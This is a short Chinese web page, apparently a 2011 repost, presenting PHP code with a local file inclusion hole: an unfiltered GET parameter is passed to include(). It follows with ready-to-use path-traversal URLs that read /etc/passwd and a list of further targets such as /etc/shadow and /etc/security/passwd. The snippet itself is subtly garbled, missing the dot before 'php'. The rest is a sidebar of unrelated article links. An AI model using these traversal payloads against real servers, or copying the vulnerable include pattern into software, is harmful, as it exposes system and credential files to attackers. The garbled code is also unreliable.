编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP+ajax 无刷新删除数据

Feb 20 PHP

114啦源码(114la)不能生成地方房产和地方报刊问题4级页面0字节的解决方法

Jan 12 PHP

php写的带缓存数据功能的mysqli类

Sep 06 PHP

编译php 5.2.14+fpm+memcached(具体操作详解)

Jun 18 PHP

ThinkPHP查询返回简单字段数组的方法

Aug 25 PHP

phpStudy访问速度慢和启动失败的解决办法

Nov 19 PHP

PHP之十六个魔术方法详细介绍

Nov 01 PHP

PHP实现找出链表中环的入口节点

Jan 16 PHP

php+mysql开发中的经验与常识小结

Mar 25 PHP

详解PHP 7.4 中数组延展操作符语法知识点

Jul 19 PHP

php设计模式之组合模式实例详解【星际争霸游戏案例】

Mar 27 PHP

tp5.1框架数据库子查询操作实例分析

May 26 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

SFTP(3) 文字识别(1) Pytesseract(1) 验证码(1) 鲲鹏(1) 追加文本(1) 裁剪图片(1) PIL(1) 柱状图(1) GCN(1)

You might like

PHP编程与应用

2006/10/09 PHP

解析php php_openssl.dll的作用

2013/07/01 PHP

php生成随机颜色方法汇总

2014/12/03 PHP

PHP实现的无限分类类库定义与用法示例【基于thinkPHP】

2018/08/06 PHP

HTML-CSS群中单选引发的“事件”

2007/03/05 Javascript

jQuery 表单验证扩展代码(二)

2010/10/20 Javascript

如何确保JavaScript的执行顺序之jQuery.html深度分析

2011/03/03 Javascript

20条学习javascript的编程规范的建议

2014/11/28 Javascript

nodejs实现HTTPS发起POST请求

2015/04/23 NodeJs

js+html5实现canvas绘制简单矩形的方法

2015/06/05 Javascript

Ionic2开发环境搭建教程

2020/08/20 Javascript

手把手教你搭建ES6的开发运行环境

2017/07/11 Javascript

JavaScript html5 canvas实现图片上画超链接

2017/10/20 Javascript

使用vue-router beforEach实现判断用户登录跳转路由筛选功能

2018/06/25 Javascript

用npm-run实现自动化任务的方法示例

2019/01/14 Javascript

jQuery实现模拟搜索引擎的智能提示功能简单示例

2019/01/27 jQuery

jquery+ajax实现上传图片并显示上传进度功能【附php后台接收】

2019/06/06 jQuery

将图片文件嵌入到wxpython代码中的实现方法

2014/08/11 Python

连接Python程序与MySQL的教程

2015/04/29 Python

在Django的视图中使用数据库查询的方法

2015/07/16 Python

Python简单实现子网掩码转换的方法

2016/04/13 Python

Python基于Opencv来快速实现人脸识别过程详解（完整版）

2019/07/11 Python

解决Django一个表单对应多个按钮的问题

2019/07/18 Python

Windows下实现将Pascal VOC转化为TFRecords

2020/02/17 Python

多个版本的python共存时使用pip的正确做法

2020/10/26 Python

玩转CSS3色彩

2010/01/16 HTML / CSS

类的核心特性有哪些

2014/01/01 面试题

数组越界问题

2015/10/21 面试题

介绍下static、final、abstract区别

2015/01/30 面试题

智能电子应届生求职信

2013/11/10 职场文书

集体婚礼策划方案

2014/02/22 职场文书

人资专员岗位职责

2014/04/04 职场文书

化学专业毕业生求职信

2014/07/28 职场文书

终止或解除劳动合同及劳动关系的证明书

2014/10/06 职场文书

高一化学教学反思

2016/02/22 职场文书

Django框架之路由用法

2022/06/10 Python